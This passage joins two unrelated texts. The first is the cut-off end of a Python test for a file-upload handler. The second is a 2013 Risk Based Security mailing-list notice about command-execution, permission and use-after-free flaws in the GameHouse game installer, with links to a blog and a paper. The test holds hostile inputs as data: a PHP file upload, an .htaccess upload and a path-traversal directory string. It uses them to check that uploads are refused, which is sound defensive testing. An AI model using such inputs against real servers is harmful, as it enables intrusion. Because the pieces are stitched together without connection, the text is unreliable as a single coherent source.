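        "vulnerable_exposed_php": served == [True],
        "refuses_php": save("banner", "1.php") is None,
        "refuses_htaccess": save("banner", ".htaccess") is None,
        "refuses_traversal": save("../../../../../../images/banner/", "ok.jpg") is None,
        "stores_jpg": save("banner", "ok.jpg") is not None,
    }
    files = [os.path.relpath(os.path.join(d, f), webroot)
             for d, _, names in os.walk(webroot) for f in names]
    results["webroot_only_jpg"] = files == [os.path.join("images", "banner", "ok.jpg")]
    return results
```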


An Analysis of the (In)Security State of the GameHouse Game Installation Mechanism

2013-09-19 Thread RBS Research
In January 2013, we encountered the latest version of RealArcade
installer provided by GameHouse (a division of RealNetworks) on a
system during an audit. Considering its historical vulnerabilities and
recent reports about vulnerabilities in game clients/installers, we
decided to take a closer look at its current security state.

It was uncovered that not only was it still affected by almost two
year old, publicly known vulnerabilities allowing command execution,
but also new issues incl. unsafe permissions and a use-after-free. The
full paper describes the flaws in the GameHouse game installer
implementation for Windows, and how it exposes users’ systems.

While not responsive (except a classic response from support - see
timeline in report), GameHouse did silently address some of these
issues in a site update around May 2013, but other concerns still
remain.

Blog:
http://www.riskbasedsecurity.com/2013/09/an-analysis-of-the-insecurity-state-of-the-gamehouse-game-installation-mechanism/

Paper:
http://www.riskbasedsecurity.com/reports/RBS-GameHouseAnalysis-Sept2013.pdf

--

Carsten Eiram
Risk Based Security

Twitter: @RiskBased / @CarstenEiram